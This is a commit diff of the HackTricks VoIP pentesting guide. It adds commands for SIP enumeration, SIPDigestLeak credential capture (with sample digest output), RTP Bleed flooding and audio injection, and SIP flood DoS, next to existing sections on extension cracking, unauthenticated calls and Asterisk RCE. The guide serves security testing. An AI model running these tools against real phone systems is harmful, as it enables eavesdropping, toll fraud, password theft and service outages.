coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GITBOOK-3881: change request with no subject merged in GitBook

Browse Source
This commit is contained in:
CPol 2023-04-23 19:20:09 +00:00 committed by gitbook-bot
parent a9e2d3b784
commit 05b150f7d2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 104 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

117
network-services-pentesting/pentesting-voip/README.md
View File

@ -83,15 +83,15 @@ Any other OSINT enumeration that helps to identify VoIP software being used will
```bash
# Use --fp to fingerprint the services
svmap 192.168.1.0/24 -p 5060-5070 [--fp]
svmap 10.10.0.0/24 -p 5060-5070 [--fp]
```
* **`sipscan.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).
```bash
./sipscan.py -i 192.168.2.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
[!] IP/Network: 192.168.2.0/24
[!] IP/Network: 10.10.0.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
@ -120,6 +120,14 @@ The PBX could also be exposing other network services such as:
* **5432 (PostgreSQL)**: PostgreSQL database
* And others...
### Methods Enumeration
It's possible to find **which methods are available** to use in the PBX using `sipenumerate.py` from [**sippts**](https://github.com/Pepelux/sippts)
```bash
python3 sipenumerate.py -i 10.10.0.10 -r 5080
```
### Extension Enumeration
Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device.
@ -127,13 +135,13 @@ Extensions in a PBX (Private Branch Exchange) system refer to the **unique inter
* **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.
```bash
svwar 192.168.1.15 -p5060 -e100-300 -m REGISTER
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
```
* **`sipextend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
```bash
python3 sipexten.py -i 192.168.2.203 -r 5080 -e 100-200
python3 sipexten.py -i 10.10.0.10 -r 5080 -e 100-200
```
* **metasploit**: You can also enumerate extensions/usernames with metasploit:
@ -146,8 +154,8 @@ auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UD
* **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.
```bash
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 # Use dictionary
enumiax -v -m3 -M3 192.168.1.1
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
enumiax -v -m3 -M3 10.10.0.10
```
## VoIP Attacks
@ -173,7 +181,7 @@ svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
{% code overflow="wrap" %}
```bash
python3 siprcrack.py -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
python3 siprcrack.py -i 10.10.0.10 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
```
{% endcode %}
@ -225,7 +233,7 @@ It's possible to send these codes in **INFO SIP messages**, in **audio** or insi
multimon -a DTMF -t wac pin.wav
```
### Asterisks Connections Misconfigurations
### Free Calls / Asterisks Connections Misconfigurations
In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**:
@ -257,7 +265,7 @@ For example, this configuration would be vulnerable:\
`type=friend`
{% endhint %}
### Asterisks Context Misconfigurations
### Free Calls / Asterisks Context Misconfigurations
In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
@ -308,14 +316,14 @@ Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, the
{% code overflow="wrap" %}
```bash
# Trying to make a call to the number 555555555 (without auth) with source number 200.
python3 sipinvite.py -i 192.168.0.1 -fu 200 -tu 555555555 -v
python3 sipinvite.py -i 10.10.0.10 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
python3 sipinvite.py -i 192.168.0.1 -tu 555555555 -t 444444444
python3 sipinvite.py -i 10.10.0.10 -tu 555555555 -t 444444444
```
{% endcode %}
### Misconfigured IVRS
### Free calls / Misconfigured IVRS
IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
@ -364,6 +372,43 @@ exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
## SIPDigestLeak
The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response.
Vulnerability scenario (for [**more information check this**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf)):
1. An IP Phone (victim) is listening on port 5060, accepting phone calls
2. The attacker sends an INVITE to the IP Phone
3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end)
4. When the phone is hung up, the **victim phone sends a BYE to the attacker**
5. The **attacker issues a 407 response** that **asks for authentication** and issues an authentication challenge
6. The **victim phone provides a response to the authentication challenge** in a second BYE
7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password
* **sipdigestleak.py** from [**sippts**](https://github.com/Pepelux/sippts)**:** SipDigestLeak exploits this vulnerability.
```bash
python3 sipdigestleak.py -i 10.10.0.10
[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
[!] Callee: 100
[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok
Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
```
### Click2Call
Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**.
@ -420,6 +465,42 @@ You could also even make Asterisk **execute a script that will leak the call** w
exten => h,1,System(/tmp/leak_conv.sh &)
```
### RTCPBleed
**RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.
RTP proxies try to address **NAT limitations** affecting RTC systems by proxying RTP streams between two or more parties. When NAT is in place, the RTP proxy software often cannot rely on the RTP IP and port information retrieved through signalling (e.g. SIP). Therefore, a number of RTP proxies have implemented a mechanism where such **IP and port tuplet is learned automatically**. This is often done by by inspecting incoming RTP traffic and marking the source IP and port for any incoming RTP traffic as the one that should be responded to. This mechanism, which may be called "learning mode", **does not make use of any sort of authentication**. Therefore **attackers** may **send RTP traffic to the RTP proxy** and receive the proxied RTP traffic meant to be for the caller or callee of an ongoing RTP stream. We call this vulnerability RTP Bleed because it allows attackers to receive RTP media streams meant to be sent to legitimate users.
Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints.
Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls.
For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
* **`rtpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
```bash
python3 rtpbleed.py -i 10.10.0.10
```
* **`rtcpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
```bash
python3 rtcpbleed.py -i 10.10.0.10
```
* **`rtpbleedflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams
```bash
python3 rtpbleedflood.py -i 10.10.0.10 -p 10070 -v
```
* **`rtpbleedinject.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams (from an audio file)
```bash
python3 rtpbleedinject.py -i 10.10.0.10 -p 10070 -f audio.wav
```
### RCE
In Asterisk you somehow manage to be able to **add extension rules and reload them** (for example by compromising a vulnerable web manager server), it's possible to get RCE using the **`System`** command.
@ -458,17 +539,27 @@ Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando
There are several ways to try to achieve DoS in VoIP servers.
* **`sipflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**: **_**SipFlood**_ sends unlimited messages to the target
* `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v`
* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
* [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
* Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
* **`sipsend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPSend allow us to send a **customized SIP message** and analyze the response.
* **`wssend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** WsSend allow us to send a customized SIP message over WebSockets and analyze the response.
### OS Vulnerabilities
The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **not update them again** and **vulnerabilities** are going to be discovered with time.
## References
* [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki)
* [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
* [https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>